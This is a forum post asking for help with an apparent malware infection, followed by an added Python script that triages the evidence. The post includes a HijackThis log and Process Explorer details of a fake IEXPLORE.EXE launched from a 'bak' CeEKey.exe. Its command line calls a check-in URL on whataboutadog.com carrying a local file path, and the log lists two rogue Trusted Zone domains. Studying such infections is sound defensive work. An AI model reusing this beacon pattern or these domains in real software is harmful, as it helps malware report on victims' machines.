First of all, I wanted to give you another data point:
I analyzed the details of the running processes with Process Explorer, in particular the duplicated IEXPLORE.EXE process.
I'm not familiar with Process Explorer either, but I noticed at least 2 details when opening the Properties of the two same-named processes:
Code:
- Genuine IEXPLORE.EXE (Properties > Image):
  Path: C:\Program Files\Internet Explorer\IEXPLORE.EXE
  Command Line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
  Parent: explorer.exe(2948)
- Fake IEXPLORE.EXE:
  Path: c:\program files\internet explorer\iexplore.exe
  Command Line: http://b.whataboutadog.com/123/checkin.php?cid=34340978&aid=10258&time=C:\DOCUME~1\miocomputer\LOCALS~1\Temp\\1191002468.dat&fw=2112&v=123&m=0&vm=0
  Parent: CeEKey.exe(3108)
That last "CeEKey.exe" corresponds to "C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe"
...as for the rest, the DLLs and registry keys connected to those processes, I don't understand much of it.
Here, then, is the HijackThis log... but I have to tell you that when I ran "Do system scan and save log file" I got a message:
For some reason your system denied write access to the Hosts file. If any hijacked domains are in this file, HijackThis may not be able to fix this.
If that happens, you need to edit the file yourself. To do this, click Start, Run and type:
notepad C:\WINDOWS\System32\drivers\etc\hosts
and press Enter. Find the line(s) HijackThis reports and delete them. Save the file as "hosts." (with quotes), and reboot.
For VISTA: simply exit HijackThis, right-click on the HijackThis icon, choose "Run as an Administrator"

Apart from this warning, which I didn't quite understand, here is the log I got (I deleted the address of the corporate network):
Code:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 23.31.21, on 28/09/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\System32\TCtrlIOHook.exe
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.exe
C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ctfmon.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\internet explorer\iexplore.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe
O4 - HKLM\..\Run: [TCtryIOHook] TCtrlIOHook.exe
O4 - HKLM\..\Run: [TFncKy] TFncKy.exe
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Program Files\PestPatrol\PPControl.exe
O4 - HKLM\..\Run: [Realtime Monitor] C:\PROGRA~1\CA\ETRUST~1\realmon.exe -s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [DrvMon.exe] C:\WINDOWS\System32\DrvMon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: PC Health.lnk = C:\Program Files\TOSHIBA\TOSHIBA Management Console\TOSHealthLocalS.vbs
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O15 - Trusted Zone: http://rete.[corporate network].it
O15 - Trusted Zone: *.whataboutadog.com
O15 - Trusted Zone: *.whataboutarabit.com
O15 - Trusted Zone: http://rete.[corporate network].it (HKLM)

PS: while checking, I found many duplicated system files (one in its own folder and the duplicate in a BAK subfolder... and they often have different sizes even though the creation date is identical) ???

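The two checks the post does by hand, comparing the Properties > Image fields of the two IEXPLORE.EXE processes and reading the HijackThis log, automated as an added example. This is not code from the original post, from Process Explorer or from HijackThis; the process records and log excerpt are constructed from the values quoted above, and the field names, the set of expected browser parents and the Trusted Zone allowlist are this example's own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: what the post reports from Process Explorer's Properties > Image tab
# for the two IEXPLORE.EXE processes. The dict keys are this example's own names.
PROCESSES = [
    {"path": r"C:\Program Files\Internet Explorer\IEXPLORE.EXE",
     "cmdline": r'"C:\Program Files\Internet Explorer\IEXPLORE.EXE"',
     "parent": "explorer.exe(2948)"},
    {"path": r"c:\program files\internet explorer\iexplore.exe",
     "cmdline": (r"http://b.whataboutadog.com/123/checkin.php?cid=34340978&aid=10258"
                 r"&time=C:\DOCUME~1\miocomputer\LOCALS~1\Temp\\1191002468.dat&fw=2112&v=123&m=0&vm=0"),
     "parent": "CeEKey.exe(3108)"},
]

# Assumption: a browser the user started interactively has explorer.exe as its parent.
EXPECTED_BROWSER_PARENTS = {"explorer.exe"}


def triage_process(rec):
    """Return the reasons a browser process record looks suspicious (empty list = nothing found)."""
    reasons = []
    parent = rec["parent"].split("(")[0].lower()
    if parent not in EXPECTED_BROWSER_PARENTS:
        reasons.append(f"unexpected parent {rec['parent']}")
    cmd = rec["cmdline"].strip()
    # A normal launch starts with the (optionally quoted) image path; a command line that is
    # just a URL means another program started IE and told it what to fetch.
    if not cmd.lstrip('"').lower().startswith(rec["path"].lower()):
        reasons.append("command line does not begin with the image path")
    m = re.search(r"https?://\S+", cmd)
    if m:
        url = urlsplit(m.group(0))
        reasons.append(f"fetches {url.hostname}{url.path}")
        # A drive-letter path inside the query string: the request reports a local file back.
        if re.search(r"[A-Za-z]:\\", url.query):
            reasons.append("URL query carries a local file path (check-in pattern)")
    return reasons


# Constructed excerpt of the HijackThis log quoted above (only the lines the triage uses).
HJT_LOG = r"""
Running processes:
C:\WINDOWS\Explorer.EXE
C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
c:\program files\internet explorer\iexplore.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it
O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe
O15 - Trusted Zone: http://rete.[corporate network].it
O15 - Trusted Zone: *.whataboutadog.com
O15 - Trusted Zone: *.whataboutarabit.com
O15 - Trusted Zone: http://rete.[corporate network].it (HKLM)
""".strip().splitlines()

# Assumption: the corporate intranet is the only Trusted Zone entry an administrator added.
TRUSTED_ZONE_ALLOWLIST = {"rete.[corporate network].it"}


def triage_hijackthis(lines):
    """Flag O15 Trusted Zone hosts outside the allowlist and image names that run from more
    than one directory (the pattern of a copy living in a 'bak' subfolder)."""
    findings = []
    dirs_by_name = defaultdict(set)
    in_procs = False
    for line in lines:
        if line.startswith("Running processes:"):
            in_procs = True
            continue
        if in_procs:
            if not line.strip():          # blank line ends the process list
                in_procs = False
                continue
            path = line.strip().lower()
            directory, _, name = path.rpartition("\\")
            dirs_by_name[name].add(directory)
            continue
        m = re.match(r"O15 - Trusted Zone: (.+?)(?: \(HKLM\))?$", line)
        if m:
            entry = m.group(1)
            host = re.sub(r"^https?://", "", entry).lstrip("*.")
            if host not in TRUSTED_ZONE_ALLOWLIST:
                findings.append(("O15", entry, "Trusted Zone entry not on the allowlist"))
    for name, dirs in dirs_by_name.items():
        if len(dirs) > 1:
            findings.append(("process", name,
                             "same image name run from several directories: " + ", ".join(sorted(dirs))))
    return findings


if __name__ == "__main__":
    for rec in PROCESSES:
        print(rec["path"], "->", triage_process(rec) or "nothing unusual")
    for finding in triage_hijackthis(HJT_LOG):
        print(*finding)
```

The process check keys on the two fields the post compares, parent and command line, rather than on the image path, which is the same for both processes and so proves nothing; the log check surfaces the E-KEY\bak copy of CeEKey.exe and the two wildcard Trusted Zone domains without needing to know anything about them in advance.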